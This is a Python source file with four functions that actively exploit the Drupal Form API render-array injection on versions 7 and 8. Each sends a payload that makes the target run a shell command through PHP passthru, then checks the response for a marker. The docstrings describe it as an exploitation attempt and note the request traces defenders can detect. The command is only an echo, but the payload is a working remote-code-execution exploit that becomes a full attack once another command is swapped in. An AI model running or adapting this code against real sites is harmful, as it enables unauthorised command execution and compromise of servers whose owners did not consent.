def isPwnAbleWithQ(host):
    """Probe a site for the Drupal Form API render-array injection, using the ``?q=`` path style.

    This is an active exploitation attempt, not a passive version check: the
    target is asked to run ``echo <signature>`` through PHP ``passthru`` and
    the bare signature in the response is taken as proof that the command
    executed. The version-7 branch of isPwnAble_2018 uses the same two-step
    flow (fetch ``form_build_id``, then trigger the AJAX callback).

    From the defender's side, the injected ``#post_render``/``#type``/``#markup``
    keys travel verbatim in the query string and the marker comes back in the
    response body, which is what request logs or a WAF rule can key on.

    Args:
        host: URL every request is posted to as-is; the Drupal path is carried
            in the ``q`` query parameter rather than appended to the URL.

    Returns:
        True when the second response contains the signature but not the
        literal ``echo <signature>`` (executed rather than reflected); False
        when the first request raises or the signature is absent. Falls off
        the end and returns None when no ``form_build_id`` is found.
    """
    # assumes ulti.genSignature() returns a unique marker string; it is used
    # unescaped as a regex pattern below, so it must contain no regex
    # metacharacters — TODO confirm
    signature = ulti.genSignature()
    # The injected render array: 'name' becomes a markup element whose
    # #post_render callback is passthru, with the command as the #markup text.
    get_params = {'q': 'user/password',
                  'name[#post_render][]': 'passthru',
                  'name[#type]': 'markup',
                  'name[#markup]': 'echo ' + signature}
    post_params = {'form_id': 'user_pass',
                   '_triggering_element_name': 'name'}
    try:
        # verify=False disables TLS certificate validation for this request.
        r = requests.post(host, data=post_params, params=get_params,
                          verify=False, timeout=20)
    except Exception as e:
        # print e
        return False
    # The first response only yields the form_build_id needed for the AJAX
    # callback; the command itself runs on the second request.
    m = re.search(r'<input type="hidden" name="form_build_id"'
                  ' value="([^"]+)"', r.text)
    if m:
        found = m.group(1)
        get_params = {'q': 'file/ajax/name/#value/' + found}
        post_params = {'form_build_id': found}
        # NOTE: unlike the first request, this one sets neither verify=False
        # nor a timeout, so it runs with the requests defaults.
        res = requests.post(host, data=post_params, params=get_params)
        detect = bool(re.search(signature, res.text))
        n = bool(re.search('echo ' + signature, res.text))
        # Only a bare signature counts: if 'echo <signature>' is present the
        # server merely reflected the payload instead of executing it.
        if detect and not n:
            return True
        else:
            return False
def exploitD7Clean(host):
    """Same render-array injection probe as isPwnAbleWithQ, but with the Drupal path in the URL.

    Instead of a ``q`` query parameter the paths ``user/password`` and
    ``file/ajax/name/%23value/<form_build_id>`` are appended to ``host``
    ("clean URL" style). As in isPwnAbleWithQ the target is asked to execute
    ``echo <signature>`` via ``passthru`` and the response is inspected for the
    marker; the request keys and the marker are the observable artefacts on the
    server side.

    Args:
        host: Base URL of the target; a trailing '/' is appended if missing.

    Returns:
        True when the second response contains the signature but not the
        literal ``echo <signature>``; False in every other case, including a
        failed first request or a missing ``form_build_id``.
    """
    # assumes ulti.genSignature() returns a marker safe to use as a regex
    # pattern (no metacharacters) — TODO confirm
    signature = ulti.genSignature()
    # Normalise to a trailing slash so the paths below can be appended.
    if(host[-1:] != '/'):
        host += '/'
    url = host + 'user/password'
    # Injected render array for the 'name' element (see isPwnAbleWithQ).
    get_params = {'name[#post_render][]': 'passthru',
                  'name[#type]': 'markup',
                  'name[#markup]': 'echo ' + signature}
    post_params = {'form_id': 'user_pass',
                   '_triggering_element_name': 'name'}
    try:
        # NOTE: no timeout on this request; verify=False disables TLS
        # certificate validation.
        r = requests.post(url, data=post_params, params=get_params,
                          verify=False)
    except Exception as e:
        # print e
        return False
    m = re.search(r'<input type="hidden" name="form_build_id"'
                  ' value="([^"]+)"', r.text)
    if m:
        found = m.group(1)
        # %23 is the URL-encoded '#'; the second step targets the AJAX path.
        url = ''.join([host, 'file/ajax/name/%23value/', found])
        post_params = {'form_build_id': found}
        # post url, not host
        # NOTE: no timeout and no verify=False on this request either.
        res = requests.post(url, data=post_params)
        detect = bool(re.search(signature, res.text))
        n = bool(re.search('echo ' + signature, res.text))
        # Bare signature without the echoed command text == executed.
        if detect and not n:
            return True
        else:
            return False
    else:
        return False
def exploitD8(host):
    """Single-request render-array injection probe against the ``user_register_form`` path.

    The render-array keys are injected under ``mail[a]`` and sent with
    ``_drupal_ajax=1`` to the URL built by ``ulti.genURLD8``; unlike the
    version-7 probes there is no preliminary ``form_build_id`` fetch. The
    response is checked for the marker the target was asked to ``echo``.

    Args:
        host: Target passed to ``ulti.genURLD8`` to build the request URL.

    Returns:
        True when the response contains the signature but not the literal
        ``echo <signature>``; False when the request raises or the signature
        is absent or merely reflected.
    """
    # assumes ulti.genSignature() returns a marker with no regex
    # metacharacters (used as a pattern below) — TODO confirm
    signature = ulti.genSignature()
    # presumably builds the user/register AJAX URL that the version-8 branch
    # of isPwnAble_2018 assembles inline; verify against ulti
    url = ulti.genURLD8(host)
    post_params = {'form_id': 'user_register_form',
                   '_drupal_ajax': '1',
                   'mail[a][#post_render][]': 'passthru',
                   'mail[a][#type]': 'markup',
                   'mail[a][#markup]': 'echo ' + signature}
    try:
        # verify=False disables TLS certificate validation; 50 s timeout.
        res = requests.post(url, data=post_params, verify=False, timeout=50)
    except Exception as e:
        # print e
        return False
    detect = bool(re.search(signature, res.text))
    n = bool(re.search('echo ' + signature, res.text))
    # Bare signature without the echoed command text == executed.
    if detect and not n:
        return True
    else:
        return False
def isPwnAble_2018(host, version, headers):
    """Version-dispatched variant of the render-array injection probe with caller-supplied headers.

    Reuses the two-step ``user/password`` / ``form_build_id`` flow of
    isPwnAbleWithQ for major version 7 and the single ``user/register`` AJAX
    request of exploitD8 for major version 8, but with a 1-second timeout on
    every request and ``headers`` forwarded to each call.

    Args:
        host: Target URL. For version 7 it is posted to as-is with the Drupal
            path in ``q``; for version 8 the AJAX path is appended directly,
            with no check that ``host`` ends in '/' (contrast exploitD7Clean).
        version: Version string; only its first character is used, so
            '7.58' and '7' are treated alike.
        headers: Extra HTTP headers passed to every ``requests.post`` call.

    Returns:
        True when the signature appears in the final response, False when a
        request raises or the signature is absent. Falls off the end and
        returns None when ``version`` starts with neither '7' nor '8', or
        when the version-7 first response carries no ``form_build_id``.
    """
    # assumes ulti.genSignature() returns a marker with no regex
    # metacharacters (used as a pattern below) — TODO confirm
    signature = ulti.genSignature()
    version = version[:1]
    if version == '7':
        get_params = {
            'q': 'user/password',
            'name[#post_render][]': 'passthru',
            'name[#type]': 'markup',
            # note the leading space, unlike the siblings' 'echo ' + signature
            'name[#markup]': ' echo ' + signature
        }
        post_params = {
            'form_id': 'user_pass',
            '_triggering_element_name': 'name'
        }
        try:
            r = requests.post(host, data=post_params, params=get_params,
                              verify=False, headers=headers, timeout=1)
        except:
            # bare except: every failure, including KeyboardInterrupt, is
            # reported as "not vulnerable"
            return False
        m = re.search(
            r'<input type="hidden" name="form_build_id"'
            ' value="([^"]+)"', r.text)
        if m:
            found = m.group(1)
            get_params = {'q': 'file/ajax/name/#value/' + found}
            post_params = {'form_build_id': found}
            # NOTE: verify=False is not set on this second request.
            res = requests.post(host, data=post_params, params=get_params,
                                headers=headers, timeout=1)
            # Unlike isPwnAbleWithQ there is no check that the literal
            # 'echo <signature>' is absent, so a response that merely
            # reflects the payload also counts as a hit.
            detect = bool(re.search(signature, res.text))
            if detect:
                return True
            else:
                return False
    if version == '8':
        # %23 is the URL-encoded '#'; host is concatenated as given, so a
        # missing trailing '/' yields a malformed path.
        host = ''.join([
            host,
            'user/register?element_parents=account/mail/%23',
            'value&ajax_form=1&_wrapper_format=drupal_ajax'
        ])
        post_params = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[a][#post_render][]': 'passthru',
            'mail[a][#type]': 'markup',
            'mail[a][#markup]': ' echo ' + signature
        }
        try:
            r = requests.post(host, data=post_params, verify=False,
                              headers=headers, timeout=1)
        except:
            # bare except, same caveat as above
            return False
        # Presence-only check; no reflected-payload exclusion here either.
        m = bool(re.search(signature, r.text))
        if m:
            return True
        else:
            return False